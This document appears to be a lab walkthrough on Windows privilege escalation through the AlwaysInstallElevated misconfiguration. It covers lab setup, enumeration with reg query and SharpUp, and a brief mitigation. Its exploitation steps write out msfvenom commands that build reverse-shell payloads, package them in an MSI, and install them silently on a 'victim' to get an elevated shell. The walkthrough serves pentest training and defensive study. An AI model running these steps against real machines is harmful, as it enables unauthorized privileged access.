"AlwaysInstallElevated" is a Windows Registry setting that affects the behavior of the Windows Installer service. The vulnerability arises when the "AlwaysInstallElevated" registry key is configured with a value of "1" in the Windows Registry.
When this registry key is enabled, it allows non-administrator users to install software packages with elevated privileges. In other words, users who shouldn't have administrative rights can exploit this vulnerability to execute arbitrary code with elevated permissions, potentially compromising the security of the system.
Open a cmd with local Administrator privileges and type gpedit.msc to open the Local Group Policy Editor.
- Navigate to Computer Configuration -> Administrative Templates -> Windows Components -> Windows Installer:
- Enable the "Always install with elevated privileges" policy:
- Confirm that the "Always install with elevated privileges" policy is set to Enabled:
- Then, navigate to User Configuration -> Administrative Templates -> Windows Components -> Windows Installer:
- Enable the "Always install with elevated privileges" policy:
- Confirm that the "Always install with elevated privileges" policy is set to Enabled:
- Open the command prompt with local Administrator privileges and execute the following command to update the computer policy:
gpupdate /force
Outcome:
Another way to set up the lab with the 'AlwaysInstallElevated' vulnerability is by using the custom PowerShell script named AlwaysInstallElevated.ps1.
Open a PowerShelll with local Administrator privileges and run the script:
.\AlwaysInstallElevated.ps1
Outcome:
To perform manual enumeration and identify whether a Windows workstation is vulnerable to the AlwaysInstallElevated issue, you can use the following commands from a command prompt:
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
and
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Outcome:
ℹ️ If either command returns a value of 1, it indicates a potential vulnerability, enabling non-administrative users to install software with elevated privileges.
To run the SharpUp tool and perform an enumeration of the AlwaysInstallElevated vulnerability, you can execute the following command with appropriate arguments:
SharpUp.exe audit AlwaysInstallElevated
Outcome:
ℹ️ Moreover, you can use SharpUp.exe audit to perform a comprehensive enumeration of all misconfigurations vulnerabilities on the specified machine.
ℹ️ In order to create a MSI file with Visual Studio, you should have pre-installed the extension named Mictosoft Visual Studio Installer Projects 2022.
Open an existing random project-> go to Extensions tab -> Manage extensions in Visual Studio. Go to the Online section, look for the extension, and download it. After successfully downloading, reopen Visual Studio.
The installation will be scheduled after you close Visual Studio. When you reopen it, the extension will be ready to use.
- Use msfvenom to generate a malicious executable (exe) file:
msfvenom -p windows/x64/shell_reverse_tcp lhost=eth0 lport=1234 -f exe > nickvourd.exe
- Open Visual studio, select Create a new project and type installer into search box. Select the Setup Wizard project and click Next:
- Provide the project with a name, for example, NCVInstaller. Choose a location, for example, C:\Payloads, opt for placing the solution and project in the same directory, and then click on Create:
- Keep clicking Next button until you get to step 3 of 4 (choose files to include). Click Add and select a malicous payload (i.e, an exe from msfvenom). Then click Finish:
- Highlight the NCVInstaller project in the Solution Explorer and in the Properties, change the TargetPlatform from x86 to x64:
- Now right-click on the project and select View > Custom Actions:
- Right-click on Install option and select Add Custom Action:
- Double-click on Application Folder, select your malicious executable file (i.e, nickvourd.exe) and click OK. This will ensure that the malicious payload is executed as soon as the installer is run.
- Change Run64Bit option from False to True:
-
Build the solution.
-
Open a listener on your Kali machine.
-
Transfer the malicious MSI file to the victim's machine.
-
Initiate the installation process for the malicious MSI package silently without any user interface:
msiexec /quiet /qn /i NCVInstaller.msi
Outcome:
- Verify the reverse shell on your Kali machine:
ℹ️ In order to remove the malicious MSI file from the victim, run the following command (in a unprivilege session):
msiexec /q /n /uninstall NCVInstaller.msi
- To perform exploitation with msfvenom, you can use the following command to create a malicious MSI file:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=1234 -f msi > nickvourd.msi
-
Open a listener on your Kali machine.
-
Transfer the malicious MSI file to the victim's machine.
-
Initiate the installation process for the malicious MSI package silently without any user interface:
msiexec /quiet /qn /i nickvourd.msi
- Verify the reverse shell on your Kali machine:
ℹ️ In order to remove MSI file from the victim, run the following command (in a unprivilege session):
msiexec /q /n /uninstall nickvourd.msi
To mitigate the AlwaysInstallElevated vulnerability, it is recommended to set the AlwaysInstallElevated value to 0 in both the HKEY_LOCAL_MACHINE and HKEY_CURRENT_USER hives in the Windows Registry.